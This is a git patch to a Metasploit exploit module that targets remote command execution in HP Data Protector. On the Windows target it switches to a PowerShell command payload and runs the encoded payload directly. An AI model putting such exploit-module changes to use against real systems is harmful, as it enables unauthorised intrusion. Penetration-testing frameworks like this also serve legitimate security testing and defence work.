From 39a09ad7507f3ea1be607aef5dbf4b71b58ec91d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 14 Oct 2014 10:24:32 -0500
Subject: [PATCH] Use ARCH_CMD on Windows target

---
 .../misc/hp_data_protector_exec_integutil.rb     | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
index 7c6699bdf9..af81b5bc9a 100644
--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -59,7 +59,13 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Windows 64 bits / HP Data Protector 9',
             {
               'Platform' => 'win',
-              'Arch'     => ARCH_X86_64,
+              'Arch'     => ARCH_CMD,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'powershell'
+                }
+              }
             }
           ]
         ],
@@ -114,11 +120,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if target.name =~ /Windows/
-      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
-      print_status("#{peer} - Exploiting through Powershell...")
-      execute_windows(command, dir)
+      #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+      print_status("#{peer} - Executing payload...")
+      execute_windows(payload.encoded, dir)
     else
-      print_status("#{peer} - Exploiting payload...")
+      print_status("#{peer} - Executing payload...")
       execute_linux(payload.encoded, dir)
     end
   end